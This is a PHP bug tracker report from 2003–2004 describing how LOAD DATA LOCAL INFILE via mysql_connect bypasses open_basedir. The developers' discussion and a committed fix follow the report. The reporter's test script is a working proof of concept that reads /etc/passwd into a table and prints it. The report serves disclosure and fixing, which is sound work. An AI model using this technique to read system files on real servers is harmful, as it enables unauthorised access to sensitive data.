php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #23779 LOAD DATA LOCAL isn't respecting open_basedir
Submitted: 2003-05-23 08:49 UTC Modified: 2004-02-03 14:53 UTC
From: php at jkt dot wz dot cz Assigned: georg
Status: Closed Package: MySQL related
PHP Version: 4.3.3-dev OS: any
Private report: No CVE-ID:
 [2003-05-23 08:49 UTC] php at jkt dot wz dot cz
i'm using php/4.3.0 (i haven't access to newer version), mysql/3.23.49 or 4.0.11-gamma; i haven't noticed any changes in cvs changelog
[http://cvs.php.net/co.php/php4/ChangeLog?login=2&r=1.1323]

if you made a connection with mysql_connect() and specify 128 as fifth parameter (options), you can perform sql LOAD DATA LOCAL INFILE statements. the file accesses are made by mysql client library, so you can access any file which webserver process can access to, IGNORING open_basedir option! (and perhaps also safe-mode uid/gid checks, i don't know...)

test script:

  $user='**';
  $pass='**';
  $host='**';
  $db='**';
  $table='files';
  $filename='/etc/passwd';
  $line_term='-----------[line_terminator]------------';

  $m=mysql_connect($host, $user, $pass, false, 128);
  // connect with MYSQL_OPT_LOCAL_INFILE (in php manual undocumented) option
  mysql_select_db($db, $m);
  mysql_query("create table if not exists $table (str text not null)", $m);
  // create our table
  mysql_query('load data local infile "'.mysql_escape_string($filename).'" into table '.$table.' lines terminated by "'.mysql_escape_string($line_term).'"');
  // upload file
  echo "ok, upload success ;-)\n";
  $res=mysql_query("select * from $table", $m);
  // verify & display
  echo '<pre>';
  while($line=mysql_fetch_assoc($res)) {
    echo htmlspecialchars($line['str']);
  }
  echo '</pre>';
  mysql_query('truncate table '.$table, $m);
  echo 'have a nice day...';

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2003-05-23 19:02 UTC] sniper@php.net
Only solution I can think of is to deny the use of MYSQL_OPT_LOCAL_INFILE either totally or just when safe-mode is enabled..

 [2003-05-23 19:10 UTC] sniper@php.net
After a bit more thinking, this is not really PHP problem
to solve, it's a security hole in Mysql..

 [2003-05-24 01:34 UTC] georg@php.net
It's not a security hole. This only works when the 
connected user has file privileges.

 [2003-05-27 02:53 UTC] php at jkt dot wz dot cz
a) not security hole in mysql, it's problem of php
b) you don't need file privileges for 'load data local infile'

solution: 
add php.ini option mysql_local_infile;
in mysql_connect() check for 128 and if not enabled, clear it (ie. option&0x7f)
 [2003-05-27 03:07 UTC] georg@php.net
Hmm.. 

...assigned to myself
 [2003-05-30 08:00 UTC] georg@php.net
This bug has been fixed in CVS.

In case this was a PHP problem, snapshots of the sources are packaged
every three hours; this change will be in the next snapshot. You can
grab the snapshot at http://snaps.php.net/.
 
In case this was a documentation problem, the fix will show up soon at
http://www.php.net/manual/.

In case this was a PHP.net website problem, the change will show
up on the PHP.net site and on the mirror sites in short time.
 
Thank you for the report, and for helping us make PHP better.


 [2003-06-02 07:42 UTC] php at jkt dot wz dot cz
ad http://cvs.php.net/co.php/php4/ext/mysql/php_mysql.c?login=2&r=1.174.2.14 :

i don't think this solution is perfect; better fix might be to introduce new php.ini option 'mysql.local_infile' and don't operate with open_basedir...

btw, i looked at http://cvs.php.net/co.php/php4/ext/mysql/php_mysql.c?login=2&r=1.192 (newest version??) and i was unable to find the fix..
(but i'm not too familiar with cvs)
 [2003-06-03 06:46 UTC] georg@php.net
We don't need another option in ini-file for, you can configure libmysql to enable/disable it by default.


 [2004-02-03 13:54 UTC] php at jkt dot wz dot cz
php/5.0.0b3 - I can't find your fix in "php-5.0.0b3/ext/mysql/php_mysql.c". Am I blind or isn't it fixed in new release?
 
PHP Copyright © 2001-2014 The PHP Group
All rights reserved.
Last updated: Sun Apr 20 08:02:33 2014 UTC